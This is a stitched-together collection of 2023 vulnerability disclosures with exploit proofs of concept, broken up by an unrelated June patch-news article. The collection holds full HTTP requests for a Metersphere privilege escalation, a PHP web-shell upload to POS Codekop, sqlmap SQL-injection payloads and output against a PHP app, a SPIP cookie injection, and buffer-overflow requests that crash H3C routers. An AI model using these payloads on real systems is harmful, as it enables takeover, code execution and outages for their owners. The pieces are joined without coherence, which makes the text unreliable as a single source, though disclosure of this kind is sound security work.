Metersphere is an open source continuous testing platform. In versions prior to 2.10.2 LTS, some key APIs in Metersphere lack permission checks. This allows ordinary users to execute APIs that can only be executed by space administrators or project administrators. For example, ordinary users can be updated as space administrators. Version 2.10.2 LTS has a patch for this issue.

**Summary**

目前metersphere 一些关键的API缺少了权限检查，比如workspace中的/setting/workspace/member/update，/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。

**PoC**

以workspace中的/setting/workspace/member/update利用为例

1 user1 是workspace1的空间管理员

2 user2 是workspace1的成员

3 user1 更新user2的信息，比如将其更新为空间管理员

4 使用burpsuite拦截请求

    以workspace中的/setting/workspace/member/update 为例
    
    POST /setting/workspace/member/update HTTP/1.1
    Host: 192.168.213.128:8081
    Content-Length: 144
    Accept-Language: zh-CN
    WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
    Content-Type: application/json
    Accept: application/json, text/plain, */*
    CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
    X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
    PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
    Origin: http://192.168.213.128:8081
    Referer: http://192.168.213.128:8081/
    Accept-Encoding: gzip, deflate
    Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
    Connection: close
    
    {"id":"user2","name":"user2","email":"user2@test.com","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}
    

5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的，即以user2的身份执行请求

6 发现执行结果成功，即普通用户可以执行管理员才能执行的update

**Impact**

普通用户可以执行空间管理员或者project管理员才能执行的API，比如可以将普通用户更新成空间管理员。

CVE-2023-35937: metersphere 存在权限检查缺失漏洞

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

Plus: Microsoft fixes 78 vulnerabilities, VMWare plugs a flaw already used in attacks, and more critical updates from June.

Summer software updates are coming thick and fast, with Apple, Google, and Microsoft issuing multiple patches for serious security flaws in June. Enterprise software firms have also been busy, with fixes released for scary holes in VMWare, Cisco, Fortinet, and Progress Software’s MOVEit products.

A significant number of security bugs squashed during the month are being used in real-life attacks, so read on, take note, and patch your affected systems as soon as you can.

Apple

Hot on the heels of iOS 16.5, June saw the release of an emergency iPhone upgrade, iOS 16.5.1. The latest iPhone update fixes security vulnerabilities in WebKit, the engine that underpins Safari, and in the kernel at the heart of the iOS system.

Tracked as CVE-2023-32439 and CVE-2023-32434, both issues are code-execution bugs and have been used in real-life attacks, Apple said on its support page.

While details about the already exploited flaws are limited, security outfit Kaspersky revealed how the kernel issue was used to perform “iOS Triangulation” attacks against its staff. Impactful because they require no interaction from the user, the “zero click” attacks use an invisible iMessage with a malicious attachment to deliver spyware.

Apple has also issued iOS 15.7.7 for older iPhones fixing the Kernel and WebKit issues, as well as a second WebKit flaw tracked as CVE-2023-32435—which was also reported by Kaspersky as part of the iOS Triangulation attacks.

Meanwhile, Apple released Safari 16.5.1, macOS Ventura 13.4.1, macOS Monterey 12.6.7, macOS Big Sur 11.7.8 , watchOS 9.5.2 and watchOS 8.8.1.

Microsoft

Microsoft’s mid-June Patch Tuesday includes security updates for 78 vulnerabilities, including 28 remote code execution (RCE) bugs. While some of the issues are serious, it is the first Patch Tuesday since March that doesn’t include any already exploited flaws.

The critical issues patched in the June update include CVE-2023-29357, an elevation of privilege vulnerability in Microsoft SharePoint Server with a CVSS score of 9.8. “An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user,” Microsoft said.

“The attacker needs no privileges, nor does the user need to perform any action,” it added.

Meanwhile, CVE-2023-32031 and CVE-2023-28310 are Microsoft Exchange Server remote code execution vulnerabilities that require an attacker to be authenticated to exploit.

Google Android

It’s time to update your Google Android device, as the tech giant has released its June Security Bulletin. The most serious issue fixed by Google is a critical security vulnerability in the System component, tracked as CVE-2023-21108, that could lead to RCE over Bluetooth with no additional execution privileges needed. Another flaw in the System tracked as CVE-2023-21130 is a RCE bug also marked as critical.

One of the flaws patched in June’s update is CVE-2022-22706, a vulnerability in Arm components that the chipmaker fixed in 2022 after it had already been used in attacks.

Apple, Google, and MOVEit Just Patched Serious Security Flaws

Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.

\# Exploit Title:Lost and Found Information System v1.0 - Sql Injection # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html # Version: V1.0.0 # Tested on:Linux REQUEST POST /php-lfis/classes/SystemSettings.php?f=update\_settings HTTP/1.1 Host: localhost Content-Length: 454 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2NerUgrr08nxdAqe X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-lfis/admin/?page=system\_info/contact\_information Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=fncg346s7j3fr654lsapbb8sqs Connection: close ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="phone" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="email" test1@test.com ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="address" test1 ------WebKitFormBoundary2NerUgrr08nxdAqe-- sqlmap -r lfis.txt --random-agent --batch -tamper=space2comment --dbs \[!\] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program \[\*\] starting @ 22:21:18 /2023-05-11/ \[22:21:18\] \[INFO\] parsing HTTP request from 'lfis.txt' \[22:21:18\] \[INFO\] loading tamper module 'space2comment' \[22:21:18\] \[INFO\] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30' from file '/usr/share/sqlmap/data/txt/user-agents.txt' Multipart-like data found in POST body. Do you want to process it? \[Y/n/q\] Y \[22:21:18\] \[INFO\] resuming back-end DBMS 'mysql' \[22:21:18\] \[INFO\] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: MULTIPART phone ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="phone''' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))oGnm) AND 'hBeF'='hBeF ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="email" test@test.com ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="address" test ------WebKitFormBoundarydhpsLF47Y6ZvrvP2-- --- \[22:21:18\] \[WARNING\] changes made by tampering scripts are not included in shown payload content(s) \[22:21:18\] \[INFO\] the back-end DBMS is MySQL web application technology: PHP 8.1.17, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) \[22:21:18\] \[INFO\] fetching database names \[22:21:18\] \[INFO\] fetching number of databases \[22:21:18\] \[WARNING\] time-based comparison requires larger statistical model, please wait.............................. (done) \[22:21:18\] \[WARNING\] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \[22:21:18\] \[WARNING\] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' \[22:21:18\] \[ERROR\] unable to retrieve the number of databases \[22:21:18\] \[INFO\] falling back to current database \[22:21:18\] \[INFO\] fetching current database \[22:21:18\] \[INFO\] resumed: lfis\_db available databases \[1\]: \[\*\] lfis\_db \[22:21:18\] \[INFO\] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost' \[22:21:18\] \[WARNING\] your sqlmap version is outdated \[\*\] ending @ 22:21:18 /2023-05-11/

CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE

SPIP version 4.2.3 suffers from a remote SQL injection vulnerability.

    ## Title: spip-v4.2.3 SQLi-cookie session vulnerability - Server SideSensitive information Disclosure!## Author: nu11secur1ty## Date: 06.28.2023## Vendor: https://www.spip.net/en_rubrique25.html## Software: https://files.spip.net/spip/archives/spip-v4.2.3.zip## Reference: https://portswigger.net/web-security/information-disclosure## Description:The spip_session cookie appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the spip_session cookie, anda database error message was returned. Two single quotes were thensubmitted and the error message disappeared. You should review thecontents of the error message, and the application's handling of otherinput, to confirm whether a vulnerability is present.Additionally, the payload ' and '8025'='8025 were submitted in thespip_session cookie, and a database error message was returned.The attacker who has an account easily can dump almost all sensitiveinformation from the server. This is the wrong configuration of thesessions of this app and a serious bug in the backend execution -function modules of this app which bug is coming from the developmentteam of this web application! No one user account or even broadcastadmin account, must not be seeing inside information of the server,except on the layer 2 level, which must be a LOCAL ADMINISTRATOR! fromthe side of the developers of this web app.STATUS: HIGH-CRITICAL Vulnerability[+]Exploit:```GETGET /pwnedhost7/ecrire/?exec=info HTTP/1.1Host: 192.168.100.45Cookie: spip_admin=%40pwned%40pwned.com; spip_accepte_ajax=1;spip_session=1_c9209323400f315bb516fdc7c5345eaeCache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/spip-v4.2.3)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/spip-v423-sqli-cookie-session.html)## Time spend:03:15:00

SPIP 4.2.3 SQL Injection

A stack overflow in the UpdateWanParams function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateWanParams, the program will go into the following handling function.  First it get the value of the key param, then use sscanf to copy the the value of param to a array v27 on the stack. In this function, the length of param is limited to 511 Bytes，but v27 only have 64 Byte. Also, the parameter %s of sscanf didn't limit the copy length. 

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 665
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp?refresh=yes?refreshFlag=Tue%20Jun%2006%202023%2015:20:40%20GMT+0800%20(China%20Standard%20Time)
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateWanParams&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

**Result**

the process webs restart

CVE-2023-34933: vuln/H3C_B1STW/CVE-2023-34933.md at main · h4kuy4/vuln

A stack overflow in the UpdateSnat function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateSnat, the program will go into the following handling function. 

First it get the value of the key param, then use sscanf to copy the the value of param to a array v11 on the stack. In this function, the length of param is limited to 511 Bytes，but v11 only have 64 Byte. Also, the parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateSnat&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

CVE-2023-34937: vuln/H3C_B1STW/CVE-2023-34937.md at main · h4kuy4/vuln

A stack overflow in the Edit_BasicSSID_5G function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is Edit_BasicSSID_5G, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v33 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=Edit\_BasicSSID\_5G&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

**Result**

the process webs restart

CVE-2023-34934: vuln/H3C_B1STW/CVE-2023-34934.md at main · h4kuy4/vuln

A stack overflow in the AddWlanMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is AddWlanList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v7 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=AddWlanMacList&param=1;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;

**Result**

the process webs restart

CVE-2023-34935: vuln/H3C_B1STW/CVE-2023-34935.md at main · h4kuy4/vuln

A stack overflow in the UpdateMacClone function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateMacClone, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v9 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateMacClone&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

Tag

#webkit